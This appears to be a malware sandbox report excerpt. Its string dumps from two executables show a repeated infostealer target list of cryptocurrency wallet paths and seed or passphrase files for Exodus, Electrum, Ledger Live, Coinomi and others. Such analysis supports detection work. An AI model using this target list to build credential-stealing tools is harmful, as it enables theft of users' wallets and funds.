Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: ea17d0b77a.exe, 0000002F.00000003.3539294349.00000000010AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: ea17d0b77a.exe, 0000002F.00000003.3395976847.00000000010F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: ea17d0b77a.exe, 0000002F.00000003.3539294349.00000000010AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: ea17d0b77a.exe, 0000002F.00000003.3396146469.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
